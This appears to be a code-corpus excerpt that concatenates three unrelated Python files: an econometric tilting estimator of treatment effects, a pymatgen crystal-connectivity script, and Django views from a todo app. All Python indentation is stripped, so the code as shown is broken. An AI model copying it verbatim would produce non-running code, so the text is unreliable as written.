phi, phi1, phi2 : N x 1 vectors with elements phi(p_W_index + lmbda't_W)
and its first and second derivatives w.r.t to
v = p_W_index + lmbda't_W
"""
# Adjust the NQ cut-off value used for quadratic extrapolation according
# to the user-defined rlgrz parameter
NQ = NQ*rlgrz
# Coefficients on quadratic extrapolation of phi(v) used to regularize
# the problem
c = -(NQ - 1)
b = NQ + (NQ - 1)*np.log(1/(NQ - 1))
a = -(NQ - 1)*(1 + np.log(1/(NQ - 1)) + 0.5*(np.log(1/(NQ - 1)))**2)
v_star = np.log(1/(NQ - 1))
# Evaluation of phi(v) and derivatives
v = p_W_index + t_W @ lmbda
phi = (v>v_star) * (v - np.exp(-v)) + (v<=v_star) * (a + b*v + 0.5*c*v**2)
phi1 = (v>v_star) * (1 + np.exp(-v)) + (v<=v_star) * (b + c*v)
phi2 = (v>v_star) * ( - np.exp(-v)) + (v<=v_star) * c
return [phi, phi1, phi2]
def ast_crit(lmbda, D, p_W, p_W_index, t_W, NQ, rlgrz, s_wgt):
"""
This function constructs the AST criterion function
as described in Graham, Pinto and Egel (2016, JBES).
INPUTS
------
lmbda : vector of tilting parameters
D : N x 1 treatment indicator vector
p_W : N x 1 MLEs of the propensity score
p_W_index : index of estimated logit propensity score
t_W : vector of balancing moments
NQ : sample size times the marginal probability of missingness
rlgrz : Regularization parameter. See discussion in main header.
s_wgt : N x 1 vector of known sampling weights (optional)
OUTPUTS
-------
crit : AST criterion function at passed parameter values
Functions called : ast_phi()
"""
lmbda = np.reshape(lmbda,(-1,1)) # make lmda 2-dimensional object
[phi, phi1, phi2] = ast_phi(lmbda, t_W, p_W_index, NQ, rlgrz) # compute phi and 1st/2nd derivatives
crit = -np.sum(s_wgt * (D * phi - (t_W @ lmbda)) * (p_W / NQ)) # AST criterion (scalar)
return crit
def ast_foc(lmbda, D, p_W, p_W_index, t_W, NQ, rlgrz, s_wgt):
"""
Returns first derivative vector of AST criterion function with respect
to lmbda. See the header for ast_crit() for description of parameters.
"""
lmbda = np.reshape(lmbda,(-1,1)) # make lmda 2-dimensional object
[phi, phi1, phi2] = ast_phi(lmbda, t_W, p_W_index, NQ, rlgrz) # compute phi and 1st/2nd derivatives
foc = -(t_W.T @ (s_wgt * (D * phi1 - 1) * (p_W / NQ))) # AST gradient (1+M x 1 vector)
foc = np.ravel(foc) # make foc 1-dimensional numpy array
return foc
def ast_soc(lmbda, D, p_W, p_W_index, t_W, NQ, rlgrz, s_wgt):
"""
Returns hessian matrix of AST criterion function with respect
to lmbda. See the header for ast_crit() for description of parameters.
"""
lmbda = np.reshape(lmbda,(-1,1)) # make lmda 2-dimensional object
[phi, phi1, phi2] = ast_phi(lmbda, t_W, p_W_index, NQ, rlgrz) # compute phi and 1st/2nd derivatives
soc = -(((s_wgt * D * phi2 * (p_W / NQ)) * t_W).T @ t_W) # AST hessian (note use of numpy broadcasting rules)
# (1 + M) x (1 + M) "matrix" (numpy array)
return [soc]
def ast_study_callback(lmbda):
print("Value of ast_crit = " + "%.6f" % ast_crit(lmbda, Ds, p_W, p_W_index, t_Ws, NQ, rlgrz, sw) + \
", 2-norm of ast_foc = "+ "%.6f" % numpy.linalg.norm(ast_foc(lmbda, Ds, p_W, p_W_index, t_Ws, \
NQ, rlgrz, sw)))
def ast_auxiliary_callback(lmbda):
print("Value of ast_crit = " + "%.6f" % ast_crit(lmbda, 1-Ds, p_W, -p_W_index, t_Ws, NQ, rlgrz, sw) + \
", 2-norm of ast_foc = "+ "%.6f" % numpy.linalg.norm(ast_foc(lmbda, 1-Ds, p_W, -p_W_index, t_Ws, \
NQ, rlgrz, sw)))
# ----------------------------------------------------------------------------------- #
# - STEP 1 : ORGANIZE DATA - #
# ----------------------------------------------------------------------------------- #
# Extract variable names from pandas data objects
dep_var = Y.name # Get dependent variable names
r_W_names = list(r_W.columns) # Get r_W variable names
t_W_names = list(t_W.columns) # Get t_W variable names
# Create pointers to pandas objects transformed into appropriately sized numpy arrays
Ds = D.values.reshape((-1,1)) # Turn pandas.Series into N x 1 numpy array
Ys = Y.values.reshape((-1,1)) # Turn pandas.Series into N x 1 numpy array
r_Ws = r_W.values # Turn pandas.DataFrame into N x 1 + L numpy array
t_Ws = t_W.values # Turn pandas.DataFrame into N x 1 + M numpy array
# Extract basic information and set-up AST problem
N = len(D) # Number of units in sample
Ns = np.sum(D) # Number of study units in the sample (treated units)
Na = N-Ns # Number of auxiliary units in the sample (control units)
M = np.shape(t_Ws)[1]
L = np.shape(r_Ws)[1]
if nocons:
M = M - 1 # Dimension of t_W (excluding constant)
L = L - 1 # Dimension of r_W (excluding constant)
DY = Ds * Ys # D*Y, N x 1 vector of observed outcomes for treated/study units
mDX = (1-Ds) * Ys # (1-D)*X, N x 1 vector of observed outcomes for non-treated/auxiliary units
# Add a constant to the regressor matrix (if needed)
if not nocons:
r_Ws = np.concatenate((np.ones((N,1)), r_Ws), axis=1)
r_W_names = ['constant'] + r_W_names
t_Ws = np.concatenate((np.ones((N,1)), t_Ws), axis=1)
t_W_names = ['constant'] + t_W_names
# Normalize weights to have mean one (if needed)
if s_wgt is None:
sw = 1
else:
s_wgt_var = s_wgt.name # Get sample weight variable name
sw = np.asarray(s_wgt/s_wgt.mean()).reshape((-1,1)) # Normalized sampling weights with mean one
# ----------------------------------------------------------------------------------- #
# - STEP 2 : ESTIMATE PROPENSITY SCORE PARAMETER BY LOGIT ML - #
# ----------------------------------------------------------------------------------- #
try:
if not silent:
print("")
print("--------------------------------------------------------------")
print("- Computing propensity score by MLE -")
print("--------------------------------------------------------------")
# CMLE of p-score coefficients
[delta_ml, vcov_delta_ml, hess_logl, score_i, p_W, _] = \
logit(D, r_W, s_wgt=s_wgt, nocons=nocons, \
c_id=c_id, silent=silent, full=False)
delta_ml = np.reshape(delta_ml,(-1,1)) # Put delta_ml into 2-dimensional form
p_W_index = r_Ws @ delta_ml # Fitted p-score index
NQ = np.sum(sw * p_W) # Sum of fitted p-scores
pi_eff = (sw * p_W) / NQ # Efficient estimate of F(W)
except:
print("FATAL ERROR: exitflag = 2, unable to compute propensity score by maximum likelihood.")
# Set all returnables to "None" and then exit function
gamma_ast = None
vcov_gamma_ast = None
pscore_tests = None
tilts = None
exitflag = 2
return [gamma_ast, vcov_gamma_ast, pscore_tests, tilts, exitflag]
# ----------------------------------------------------------------------------------- #
# - STEP 3 : SOLVE FOR AST TILTING PARAMETERS - #
# -----------------------------------------------------------------------------------
# Set optimization parameters
if silent:
# Use Newton-CG solver with vector of zeros as starting values,
# low tolerance levels, and smaller number of allowed iterations.
# Hide iteration output.
options_set = {'xtol': 1e-8, 'maxiter': 1000, 'disp': False}
else:
# Use Newton-CG solver with vector of zeros as starting values,
# high tolerance levels, and larger number of allowed iterations.
# Show iteration output.
options_set = {'xtol': 1e-12, 'maxiter': 10000, 'disp': True}
lambda_sv = np.zeros(1+M) # use vector of zeros as starting values
#------------------------------#
#- STUDY TILT -#
#------------------------------#
# NOTE: Only compute the study_tilt if directed to do so (this is the default). The study_tilt
# doesn't need to be computed if all the elements of t(W) are also included in h(W). It
# is the users responsibility to check this condition.
if study_tilt:
# -------------------------------------------------- #
# - CASE 1: Non-trivial study sample tilt required - #
# -------------------------------------------------- #
# Compute lamba_s_hat (study or treated sample tilting parameters)
try:
if not silent:
print("")
print("--------------------------------------------------------------")
print("- Computing study/treated sample tilt -")
print("--------------------------------------------------------------")
# Derivative check at starting values
grad_norm = sp.optimize.check_grad(ast_crit, ast_foc, lambda_sv, Ds, p_W, \
p_W_index, t_Ws, NQ, rlgrz, \
sw, epsilon = 1e-12)
print('Study sample tilt derivative check (2-norm): ' + "%.8f" % grad_norm)
# Solve for tilting parameters
lambda_s_res = sp.optimize.minimize(ast_crit, lambda_sv, args=(Ds, p_W, p_W_index, \
t_Ws, NQ, rlgrz, sw), \
method='Newton-CG', jac=ast_foc, hess=ast_soc, \
callback = ast_study_callback, options=options_set)
else:
# Solve for tilting parameters
lambda_s_res = sp.optimize.minimize(ast_crit, lambda_sv, args=(Ds, p_W, p_W_index, \
t_Ws, NQ, rlgrz, sw), \
method='Newton-CG', jac=ast_foc, hess=ast_soc, \
options=options_set)
except:
print("FATAL ERROR: exitflag = 3, Unable to compute the study/treated vector of tilting parameters.")
# Set all returnables to "None" and then exit function
gamma_ast = None
vcov_gamma_ast = None
pscore_tests = None
tilts = None
exitflag = 3
return [gamma_ast, vcov_gamma_ast, pscore_tests, tilts, exitflag]
# Collect study tilt estimation results needed below
lambda_s_hat = np.reshape(lambda_s_res.x,(-1,1)) # study/treated sample tilting
# parameter estimates
p_W_s = (1+np.exp(-(p_W_index) - (t_Ws @ lambda_s_hat)))**-1 # study/treated sample tilted p-score
pi_s = Ds * pi_eff / p_W_s # study/treated sample tilt
else:
# ------------------------------------------ #
# - CASE 2: Study sample tilt NOT required - #
# ------------------------------------------ #
if not silent:
print("")
print("----------------------------------------------------------------------")
print("- Tilt of study sample not requested by user (study_tilt = False). -")
print("- Validity of this requires all elements of t(W) to be elements of -")
print("- h(W) as well. User is advised to verify this condition. -")
print("----------------------------------------------------------------------")
print("")
# Collect study tilt objects needed below
lambda_s_hat = np.reshape(lambda_sv ,(-1,1)) # study/treated sample tilting parameters set equal to zero
p_W_s = p_W # study/treated sample tilted p-score equals actual score
pi_s = Ds * pi_eff / p_W_s # set pi_s to "empirical measure" of study sub-sample
# (w/o sampling weights this puts mass 1/Ns on each study unit)
#------------------------------#
#- AUXILIARY TILT -#
#------------------------------#
# Compute lamba_a_hat (auxiliary or control sample tilting parameters)
try:
if not silent:
print("")
print("--------------------------------------------------------------")
print("- Computing auxiliary/control sample tilt -")
print("--------------------------------------------------------------")
# Derivative check at starting values
grad_norm = sp.optimize.check_grad(ast_crit, ast_foc, lambda_sv, 1-Ds, p_W, \
-p_W_index, t_Ws, NQ, rlgrz, \
sw, epsilon = 1e-12)
print('Auxiliary sample tilt derivative check (2-norm): ' + "%.8f" % grad_norm)
# Solve for tilting parameters
lambda_a_res = sp.optimize.minimize(ast_crit, lambda_sv, args=(1-Ds, p_W, -p_W_index, \
t_Ws, NQ, rlgrz, sw), \
method='Newton-CG', jac=ast_foc, hess=ast_soc, \
callback = ast_auxiliary_callback, options=options_set)
else:
# Solve for tilting parameters
lambda_a_res = sp.optimize.minimize(ast_crit, lambda_sv, args=(1-Ds, p_W, -p_W_index, \
t_Ws, NQ, rlgrz, sw), \
method='Newton-CG', jac=ast_foc, hess=ast_soc, \
options=options_set)
except:
print("FATAL ERROR: exitflag = 4, Unable to compute the auxiliary/control vector of tilting parameters.")
# Set returnables to "None" and then exit function
gamma_ast = None
vcov_gamma_ast = None
pscore_tests = None
tilts = None
exitflag = 4
return [gamma_ast, vcov_gamma_ast, pscore_tests, tilts, exitflag]
# Collect auxiliary tilt estimation results needed below
lambda_a_hat = -np.reshape(lambda_a_res.x,(-1,1)) # auxiliary/control sample tilting
# parameter estimates
p_W_a = (1+np.exp(-(p_W_index) - (t_Ws @ lambda_a_hat)))**-1 # auxiliary sample tilted p-score
pi_a = (1-Ds) * (pi_eff / (1-p_W_a)) # auxiliary sample tilt
# ----------------------------------------------------------------------------------- #
# - STEP 4 : SOLVE FOR AST ESTIMATE OF GAMMA (i.e., ATT) - #
# ----------------------------------------------------------------------------------- #
# AST estimate of gamma -- the ATT %
gamma_ast = np.sum(sw * p_W * ((Ds / p_W_s) * DY - (1-Ds) / (1-p_W_a) * mDX))/NQ;
# ----------------------------------------------------------------------------------- #
# - STEP 5 : FORM LARGE SAMPLE VARIANCE-COVARIANCE ESTIMATES - #
# ----------------------------------------------------------------------------------- #
# Form moment vector corresponding to full three step procedure
m1 = (sw * (Ds - p_W) * r_Ws).T # 1+L x N matrix of m_1 moments (logit scores)
m2 = (sw * ((1 - Ds) / (1 - p_W_a) - 1) * p_W * t_Ws).T # 1+M x N matrix of m_2 moments
m3 = (sw * (Ds / p_W_s - 1) * p_W * t_Ws).T # 1+M x N matrix of m_3 moments
m4 = (sw * p_W * ((Ds / p_W_s) * DY - ((1-Ds) / (1-p_W_a)) * (mDX+gamma_ast))).T # 1 x N matrix of m_4 moments
m = np.concatenate((m1, m2, m3, m4), axis=0) # 1 + L + 2(1 + M) + 1 x N matrix of all moments
# Calculate covariance matrix of moment vector. Take into account any
# within-group dependence/clustering as needed
if c_id is None:
# Case 1: No cluster dependence to account for when constructing covariance matrix
C = N # Number of clusters equals number of observations
fsc = N/(N - (1+L+2*(1+M)+1)) # Finite-sample correction factor
V_m = fsc*(m @ m.T)/N
else:
# Case 2: Need to correct for cluster dependence when constructing covariance matrix
# Get number and unique list of clusters
c_list = np.unique(c_id)
C = len(c_list)
# Calculate cluster-robust variance-covariance matrix of m
# Sum moment vector within clusters
sum_m = np.empty((C,1+L+2*(1+M)+1)) # initiate vector of cluster-summed moments
for c in range(0,C):
# sum of moments for units in c-th cluster
b_cluster = np.nonzero((c_id == c_list[c]))[0] # Observations in c-th cluster
sum_m[c,:] = np.sum(m[np.ix_(range(0,1+L+2*(1+M)+1), b_cluster)], axis = 1) # Sum over "columns" within c-th cluster
# Compute variance-covariance matrix of moment vector
fsc = (N/(N - (1+L+2*(1+M)+1)))*(C/(C-1)) # Finite-sample correction factor
V_m = fsc*(sum_m.T @ sum_m)/C # Variance-covariance of the summed moments
# Form Jacobian matrix for entire parameter: theta = (rho, delta, lambda, gamma)
e_V = np.exp(np.dot(r_Ws, delta_ml))
e_Va = np.exp(np.dot(r_Ws, delta_ml) + np.dot(t_Ws, lambda_a_hat))
e_Vs = np.exp(np.dot(r_Ws, delta_ml) + np.dot(t_Ws, lambda_s_hat))
M1_delta = np.dot((sw * (- e_V / (1 + e_V)**2) * r_Ws).T, r_Ws)/N # 1 + L x 1 + L
M2_delta = np.dot((sw * ((1 - Ds) / (1 - p_W_a) - 1) * (e_V / (1 + e_V)**2) * t_Ws).T, r_Ws)/N # 1 + M x 1 + L
M3_delta = np.dot((sw * (Ds / p_W_s - 1) * (e_V / (1 + e_V)**2) * t_Ws).T, r_Ws)/N # 1 + M x 1 + L
M4_delta = np.dot((sw * (e_V / (1 + e_V)**2) * \
((Ds / p_W_s) * DY - ((1 - Ds) / (1 - p_W_a)) * (mDX + gamma_ast))).T, r_Ws)/N # 1 x 1 + L
M2_lambda_a = np.dot(( sw * ((1 - Ds) / (1 - p_W_a)**2) * p_W * (e_Va / (1 + e_Va)**2) * t_Ws).T, t_Ws)/N # 1 + M x 1 + M
M4_lambda_a = np.dot((-sw * ((1 - Ds) / (1 - p_W_a)**2) * p_W * (mDX+gamma_ast) * (e_Va / (1 + e_Va)**2)).T, t_Ws)/N # 1 x 1 + M
M3_lambda_s = np.dot((-sw * (Ds / p_W_s**2) * p_W * (e_Vs / (1 + e_Vs)**2) * t_Ws).T, t_Ws)/N # 1 + M x 1 + M
M4_lambda_s = np.dot((-sw * (Ds / p_W_s**2) * p_W * DY * (e_Vs / (1 + e_Vs)**2)).T, t_Ws)/N # 1 x 1 + M
M4_gamma = -(NQ/N).reshape(1,1) # 1 x 1
M1 = np.hstack((M1_delta, np.zeros((1+L,1+M)), np.zeros((1+L,1+M)), np.zeros((1+L,1))))
M2 = np.hstack((M2_delta, M2_lambda_a, np.zeros((1+M,1+M)), np.zeros((1+M,1))))
M3 = np.hstack((M3_delta, np.zeros((1+M,1+M)), M3_lambda_s, np.zeros((1+M,1))))
M4 = np.hstack((M4_delta, M4_lambda_a, M4_lambda_s, M4_gamma))
# Concatenate Jacobian and compute inverse
M_hat = (N/C)*np.vstack((M1, M2, M3, M4))
iM_hat = np.linalg.inv(M_hat)
# Compute sandwich variance estimates
vcov_theta_ast = (iM_hat @ V_m @ iM_hat.T)/C
vcov_gamma_ast = vcov_theta_ast[-1,-1]
exitflag = 1 # AST estimate of the ATT successfully computed!
# ----------------------------------------------------------------------------------- #
# - STEP 6 : COMPUTE TEST STATISTICS BASED ON TILTING PARAMETER - #
# ----------------------------------------------------------------------------------- #
# Compute propensity score specification test based on study tilt (if applicable)
if study_tilt:
iV_lambda_s = np.linalg.inv(vcov_theta_ast[1+L:1+L+1+M,1+L:1+L+1+M])
ps_test_st = np.dot(np.dot(lambda_s_hat.T, iV_lambda_s), lambda_s_hat)
dof_st = len(lambda_s_hat)
pval_st = 1 - sp.stats.chi2.cdf(ps_test_st[0,0], dof_st)
study_test = [ps_test_st[0,0], dof_st, pval_st]
else:
study_test = [None, None, None]
# Compute propensity score specification test based on auxiliary tilt (always done)
iV_lambda_a = np.linalg.inv(vcov_theta_ast[1+L+1+M:1+L+1+M+1+M,1+L+1+M:1+L+1+M+1+M])
ps_test_at = np.dot(np.dot(lambda_a_hat.T, iV_lambda_a), lambda_a_hat)
dof_at = len(lambda_a_hat)
pval_at = 1 - sp.stats.chi2.cdf(ps_test_at[0,0], dof_at)
auxiliary_test = [ps_test_at[0,0], dof_at, pval_at]
# ----------------------------------------------------------------------------------- #
# - STEP 7 : DISPLAY RESULTS - #
# ----------------------------------------------------------------------------------- #
if not silent:
print("")
print("-------------------------------------------------------------------------------------------")
print("- Auxiliary-to-Study (AST) estimates of the ATT -")
print("-------------------------------------------------------------------------------------------")
print("ATT: " + "%10.6f" % gamma_ast)
print(" (" + "%10.6f" % np.sqrt(vcov_gamma_ast) + ")")
print("")
print("-------------------------------------------------------------------------------------------")
if c_id is None:
print("NOTE: Outcome variable = " + dep_var)
print(" Heteroscedastic-robust standard errors reported")
print(" N1 = " "%0.0f" % Ns + ", N0 = " + "%0.0f" % Na)
else:
print("NOTE: Outcome variable = " + dep_var)
print(" Cluster-robust standard errors reported")
print(" Cluster-variable = " + c_id.name)
print(" Number of clusters = " + "%0.0f" % C)
print(" N1 = " "%0.0f" % Ns + ", N0 = " + "%0.0f" % Na)
if s_wgt is not None:
print("NOTE: (Sampling) Weighted AST estimates computed.")
print(" Weight-variable = " + s_wgt_var)
print("")
print("-------------------------------------------------------------------------------------------")
print("- Maximum likelihood estimates of the p-score -")
print("-------------------------------------------------------------------------------------------")
print("")
print("Independent variable Coef. ( Std. Err.) ")
print("-------------------------------------------------------------------------------------------")
c = 0
for names in r_W_names:
print(names.ljust(25) + "%10.6f" % delta_ml[c] + \
" (" + "%10.6f" % np.sqrt(vcov_theta_ast[c,c]) + ")")
c += 1
print("")
print("-------------------------------------------------------------------------------------------")
print("- Tilting parameter estimates -")
print("-------------------------------------------------------------------------------------------")
if study_tilt:
print("")
print("TREATED (study) sample tilt")
print("-------------------------------------------------------------------------------------------")
print("")
print("Independent variable Coef. ( Std. Err.) ")
print("-------------------------------------------------------------------------------------------")
c = 0
for names in t_W_names:
print(names.ljust(25) + "%10.6f" % lambda_s_hat[c] + \
" (" + "%10.6f" % np.sqrt(vcov_theta_ast[1+L+c,1+L+c]) + ")")
c += 1
print("")
print("Specification test for p-score (H_0 : lambda_s = 0)")
print("-------------------------------------------------------------------------------------------")
print("chi-square("+str(dof_st)+") = " + "%10.6f" % ps_test_st + " p-value: " + "% .6f" % pval_st)
print("")
print("Summary statistics study/treated re-weighting")
print("-------------------------------------------------------------------------------------------")
j = np.where(D)[0] # find indices of treated units
N_s_eff = 1/np.sum(pi_s[j]**2) # Kish's formula for effective sample size
print("Kish's effective study/treated sample size = " "%0.0f" % N_s_eff)
print("")
print("Percentiles of N_s * pi_s distribution")
quantiles = [1, 5, 10, 25, 50, 75, 90, 95, 99]
qnt_pi_s = np.percentile(Ns*pi_s[j],quantiles)
c = 0
for q in quantiles:
print("%2.0f" % quantiles[c] + " percentile = " "%2.4f" % qnt_pi_s[c])
c += 1
else:
print("")
print("--------------------------------------------------------")
print("- NOTE: Study tilt not computed (study_tilt = False). -")
print("- Components of t(W) assumed to be also in h(W). -")
print("--------------------------------------------------------")
print("")
print("")
print("CONTROL (auxiliary) sample tilt")
print("-------------------------------------------------------------------------------------------")
print("")
print("Independent variable Coef. ( Std. Err.) ")
print("-------------------------------------------------------------------------------------------")
c = 0
for names in t_W_names:
print(names.ljust(25) + "%10.6f" % lambda_a_hat[c] + \
" (" + "%10.6f" % np.sqrt(vcov_theta_ast[1+L+1+M+c,1+L+1+M+c]) + ")")
c += 1
print("")
print("Specification test for p-score (H_0 : lambda_a = 0)")
print("-------------------------------------------------------------------------------------------")
print("chi-square("+str(dof_at)+") = " + "%10.6f" % ps_test_at + " p-value: " + "% .6f" % pval_at)
print("")
print("Summary statistics auxiliary/control re-weighting")
print("-------------------------------------------------------------------------------------------")
j = np.where(1-D)[0] # find indices of control units
N_a_eff = 1/np.sum(pi_a[j]**2) # Kish's formula for effective sample size
print("Kish's effective auxiliary/control sample size = " "%0.0f" % N_a_eff)
print("")
print("Percentiles of N_a * pi_a distribution")
quantiles = [1, 5, 10, 25, 50, 75, 90, 95, 99]
qnt_pi_a = np.percentile(Na*pi_a[j],quantiles)
c = 0
for q in quantiles:
print("%2.0f" % quantiles[c] + " percentile = " "%2.4f" % qnt_pi_a[c])
c += 1
# ------------------------------------------- #
# Construct "exact balancing" table - #
# ------------------------------------------- #
Na_wgt = np.sum(sw * (1-Ds) , axis = 0)
Ns_wgt = np.sum(sw * Ds , axis = 0)
# Compute means of t_W across various distribution function estimates
# Mean of t(W) across controls
mu_t_D0 = np.sum(sw * (1-Ds) * t_Ws, axis = 0)/Na_wgt
mu_t_D0_std = np.sqrt(np.sum(sw * (1-Ds) * (t_Ws - mu_t_D0)**2, axis = 0)/Na_wgt)
# Mean of t(W) across treated
mu_t_D1 = np.sum(sw * Ds * t_Ws, axis = 0)/Ns_wgt
mu_t_D1_std = np.sqrt(np.sum(sw * Ds * (t_Ws - mu_t_D1)**2, axis = 0)/Ns_wgt)
# Normalized mean differences across treatment and controls
# (cf., Imbens, 2015, Journal of Human Resources)
NormDif_t = (mu_t_D1 - mu_t_D0)/np.sqrt((mu_t_D1_std**2 + mu_t_D0_std**2)/2)
# Semiparametrically efficient estimate of mean of t(W) across treated
mu_t_eff = np.sum(pi_eff * t_Ws, axis = 0)
mu_t_eff_std = np.sqrt(np.sum(pi_eff * (t_Ws - mu_t_eff)**2, axis = 0))
# Mean of t(W) across controls after re-weighting
mu_t_a = np.sum(pi_a * t_Ws, axis = 0)
mu_t_a_std = np.sqrt(np.sum(pi_a * (t_Ws - mu_t_a)**2, axis = 0))
# Mean of t(W) across treated after re-weighting
mu_t_s = np.sum(pi_s * t_Ws, axis = 0)
mu_t_s_std = np.sqrt(np.sum(pi_s * (t_Ws - mu_t_s)**2, axis = 0))
# Pre-balance table
print("")
print("Means & standard deviations of t_W (pre-balance) ")
print("-------------------------------------------------------------------------------------------")
print(" Treated (D = 1) Control (D = 0) Norm. Diff. ")
print("-------------------------------------------------------------------------------------------")
c = 0
for names in t_W_names:
print(names.ljust(25) + "%8.4f" % mu_t_D1[c] + " (" + "%8.4f" % mu_t_D1_std[c] + ") " \
+ "%8.4f" % mu_t_D0[c] + " (" + "%8.4f" % mu_t_D0_std[c] + ") " \
+ "%8.4f" % NormDif_t[c])
c += 1
# Post-balance table
print("")
print("Means and standard deviations of t_W (post-balance) ")
print("-------------------------------------------------------------------------------------------")
print(" Treated (D = 1) Control (D = 0) Efficient (D = 1)")
print("-------------------------------------------------------------------------------------------")
c = 0
for names in t_W_names:
print(names.ljust(25) + "%8.4f" % mu_t_s[c] + " (" + "%8.4f" % mu_t_s_std[c] + ") " \
+ "%8.4f" % mu_t_a[c] + " (" + "%8.4f" % mu_t_a_std[c] + ") " \
+ "%8.4f" % mu_t_eff[c] + " (" + "%8.4f" % mu_t_eff_std[c] + ") ")
c += 1
# Collect/format remaining returnables and exit function
pscore_tests = [study_test, auxiliary_test] # Collect p-score test results
tilts = np.concatenate((pi_eff, pi_s, pi_a), axis=1) # Collect three sample tilts
return [gamma_ast, vcov_gamma_ast, pscore_tests, tilts, exitflag] | mit |
tchen0965/structural_descriptors_repo | run_connectivity.py | 1 | 1345 | from pymatgen.core.structure import Structure
from pymatgen.analysis.structure_analyzer import VoronoiCoordFinder
import connectivity_from_structure as connectivity
__author__ = 'Tina_Chen'
__contributor__ = 'Anubhav Jain'
if __name__ == '__main__':
# path to structure file
path = 'LiCoO2.cif'
# optional list of strings with central/target species abbreviations
# (i.e. we aim to find connectivity between polyhedra with these species at the center)
central_species = ['Li']
# optional list of strings with peripheral species abbreviations
# (i.e. we aim to find connectivity where these species are surrounding the central/target species)
peripheral_species = None
# radius from the central/target sites to which we look for peripheral species
# only needs to be changed if central species is very large (eg: Ba, Sr)
radius = 2.6
structure = Structure.from_file(path, True, True)
print structure
connectivity_matrix, all_polyhedra, supercell = \
connectivity.get_connectivity_matrix(structure, True, radius, peripheral_species, central_species)
descriptions = connectivity.get_connectivity_description(connectivity_matrix, all_polyhedra, structure, True, anions=peripheral_species)
for cation in descriptions:
print ""
print descriptions[cation]
| mit |
BRupholdt/KissTodo | todo/views.py | 1 | 16586 | # KissTodo - a simple, Django based todo management tool.
# Copyright (C) 2011 Massimo Barbieri - http://www.massimobarbieri.it
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.shortcuts import render_to_response
from django.http import HttpResponseRedirect
from django.http import HttpResponse
from django.template.loader import get_template
from django.core.urlresolvers import reverse
from django.template import RequestContext
from django.contrib.auth.decorators import login_required
from django.contrib.auth import logout
from django.conf import settings
from django import forms
from random import choice
from datetime import datetime
import os
if settings.KISSTODO_USE_GAE:
from google.appengine.api import users
from google.appengine.api import mail
from models import *
def my_login_required(function):
def decorated_view(*args, **kwargs):
if settings.KISSTODO_USE_GAE:
f = function # GAE authentication, nothing to do (see app.yaml)
else:
f = login_required(function) # Django authentication
return f(*args, **kwargs)
return decorated_view
def test_page(request):
if 'op' in request.POST and request.POST['op']=='simulate error':
raise Exception("Simulated Error!")
return render_to_response('todo/test_page.html',
#RequestContext(request, {'media_root':settings.MEDIA_ROOT, 'lists':List.objects, 'todos':Todo.objects,}))
RequestContext(request, {'media_root':settings.MEDIA_ROOT}))
@my_login_required
def board(request, mobile=False, selected_list_id=''):
inbox = List.objects.get_or_create_inbox(_get_current_user(request))
if settings.KISSTODO_USE_GAE:
logout_url=users.create_logout_url(settings.KISSTODO_SITE_URL)
else:
logout_url=reverse('logout')
#login_url=users.create_login_url("/")
#request.session['mobile']=mobile
return render_to_response('todo/board.html', RequestContext(request, {'inbox_list_id':inbox.id, 'logout_url':logout_url, 'mobile':mobile, 'selected_list_id':selected_list_id}))
def _do_send_mail(t, request):
address_from = "todo_reminder@"+str(os.environ['APPLICATION_ID'])+".appspotmail.com"
address_to = t.list.owner
if not '@' in address_to: address_to += "@gmail.com"
subject="KissTodo notification"
template = get_template('todo/todo_notification_email.txt')
ctx=RequestContext(request, {'todo':t})
mail.send_mail(sender=address_from,to=address_to,subject=subject,body=template.render(ctx))
def todo_send_mail(request):
todos = Todo.objects.filter(notify_todo=True, complete=False, due_date__isnull=False).order_by('due_date')
res = "\nres:\n"
now = datetime.now()
for t in todos:
if t.due_date - timedelta(minutes=t.notify_minutes) + timedelta(minutes=t.time_offset)< now:
res += "\nTODO:"+t.description+"\n"
_do_send_mail(t, request)
t.notify_todo=False
t.save()
return HttpResponse(str(now)+res, mimetype="text/plain")
@my_login_required
def todo_empty_trash(request):
for t in Todo.objects.deleted(_get_current_user(request)): t.delete_raw()
return HttpResponse("", mimetype="text/plain")
@my_login_required
def todo_clear_completed_items(request, list_id):
l=List.objects.get(id=int(list_id))
_check_permission(request, l)
todos=Todo.objects.filter(list__id=list_id)
for t in todos:
if t.complete: t.delete_raw()
return HttpResponse("", mimetype="text/plain")
@my_login_required
def todo_search(request, search_string, sort_mode, show_complete='F'):
todos = Todo.objects.search(_get_current_user(request), search_string)
if (show_complete=='F'):
todos = [t for t in todos if not t.complete]
return render_to_response('todo/todo_list.html', RequestContext(request, {'todos':Todo.todo_sort(todos, sort_mode), 'show_list': True }))
@my_login_required
def todo_list(request, list_id, sort_mode, show_complete='F', mobile=False):
#import time
#time.sleep(1)
if int(list_id)>0:
l=List.objects.get(id=int(list_id))
_check_permission(request, l)
show_list = False
show_empty_trash = False
show_clear_completed_items = False
if int(list_id)==-2:
todos = Todo.objects.hot(_get_current_user(request))
show_list = True
elif int(list_id)==-3:
todos = Todo.objects.deleted(_get_current_user(request))
show_list = True
if len(todos)>0: show_empty_trash = True
elif int(list_id)==-4:
todos = Todo.objects.all_by_user(_get_current_user(request))
show_list = True
else:
todos = Todo.objects.filter(list__id=list_id)
#if (show_complete=='F'):
# todos = [t for t in todos if not t.complete]
if int(list_id)>0: show_clear_completed_items=any([t.complete for t in todos])
return render_to_response('todo/todo_list.html', RequestContext(request, {'list_id':list_id,'todos':Todo.todo_sort(todos, sort_mode), 'show_list':show_list, 'show_empty_trash':show_empty_trash, 'show_clear_completed_items':show_clear_completed_items, 'mobile':mobile}))
@my_login_required
def list_list(request, selected_list_id, mobile=False):
inbox = List.objects.get_or_create_inbox(_get_current_user(request))
return render_to_response('todo/list_list.html', RequestContext(request, {'lists':List.objects.filter(owner=_get_current_user(request)), 'inbox_list': inbox, 'selected_list_id': str(selected_list_id), 'mobile':mobile}))
@my_login_required
def list_add(request):
l=List()
l.name=request.POST['name']
l.owner=_get_current_user(request)
if not l.is_special():
l.save()
out = l.id
else:
out=-1
return HttpResponse(out, mimetype="text/plain")
@my_login_required
def list_delete(request):
l=List.objects.get(id=int(request.POST['list_id']))
_check_permission(request, l)
l.delete()
